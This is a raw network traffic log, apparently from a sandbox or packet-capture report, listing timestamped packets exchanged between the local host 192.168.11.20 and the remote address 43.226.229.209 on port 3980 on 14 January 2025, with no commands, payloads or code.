                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279728889 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279795885 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279844046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.279959917 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280076981 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280143023 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280194998 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280308962 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280364990 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280437946 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280544996 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280653954 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280663013 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280781031 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280823946 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280898094 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.280992031 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281012058 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281126976 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281162024 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281270027 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281382084 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281486034 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281505108 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281629086 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281714916 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281718016 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281836987 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281888962 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.281949997 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282064915 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282183886 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282188892 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282319069 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282398939 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282418966 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282535076 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282649994 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282738924 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282768011 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282883883 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.282908916 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.283029079 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.283058882 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.283123970 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.283374071 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.816219091 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.816443920 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819185019 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819363117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819477081 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819591045 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819700003 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819865942 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.819904089 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820137978 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820322990 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820374966 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820494890 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820611954 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820663929 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820712090 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820828915 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820893049 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.820965052 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821046114 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821171999 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821233988 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821310997 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821373940 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821398020 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821518898 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821567059 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821624994 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821727991 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821845055 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821907043 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.821963072 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822074890 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822078943 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822226048 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822244883 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822313070 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822427988 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822546959 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822582006 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822664976 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822757006 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822788954 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.822911978 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823014975 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823076010 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823133945 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823245049 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823250055 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823381901 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823415041 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823487043 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823605061 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823717117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823755026 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823834896 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823920965 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.823949099 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824075937 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824090958 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824228048 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824300051 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824419022 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824431896 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824568987 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824600935 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824654102 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824769974 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824887037 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.824944973 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825006008 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825114012 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825119972 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825253010 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825351954 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825450897 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825470924 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825601101 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825622082 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825704098 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825793028 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825823069 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.825947046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826056004 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826136112 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826167107 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826293945 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826303005 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826441050 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826474905 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826525927 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826641083 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826759100 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826814890 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826877117 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826982975 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.826991081 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827122927 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827153921 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827227116 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827342033 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827457905 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827495098 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827578068 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827661037 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827693939 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827817917 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.827928066 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828005075 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828057051 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828162909 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828171968 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828305960 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828393936 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828511000 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828515053 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828651905 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828684092 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828752041 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828855038 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828862906 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.828994989 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829094887 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829190969 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829214096 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829339981 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829360962 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829498053 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829534054 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829567909 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829690933 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829799891 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829874992 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.829927921 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830034018 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830041885 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830178022 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830214024 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830271006 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830383062 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830498934 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830554962 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830621004 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830722094 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830734015 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830873013 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830892086 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.830969095 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831085920 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831202984 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831234932 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831370115 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831403017 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831453085 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831557035 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831667900 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831744909 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831794024 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831906080 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.831913948 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832048893 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832140923 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832253933 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832254887 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832386017 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832425117 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832492113 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832591057 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832607031 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832736015 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832839966 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832931042 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.832957983 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833082914 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833101988 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833237886 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833273888 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833304882 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833434105 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833543062 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833615065 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833667994 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833781958 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833785057 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.833920956 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834011078 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834125042 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834125042 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834263086 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834295034 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834363937 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834460974 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834476948 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834602118 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834711075 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834800959 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834826946 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834952116 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.834971905 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835110903 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835144997 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835176945 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835305929 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835412979 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835484982 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835534096 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835653067 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835654020 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835786104 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835824966 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835889101 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.835998058 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836116076 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836164951 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836235046 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836332083 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836349010 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836474895 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836505890 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836582899 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836699009 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836817026 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836842060 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.836980104 CET39804976843.226.229.209192.168.11.20
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837017059 CET497683980192.168.11.2043.226.229.209
                                                                                                                                                                                                                                  Jan 14, 2025 11:06:38.837048054 CET39804976843.226.229.209192.168.11.20
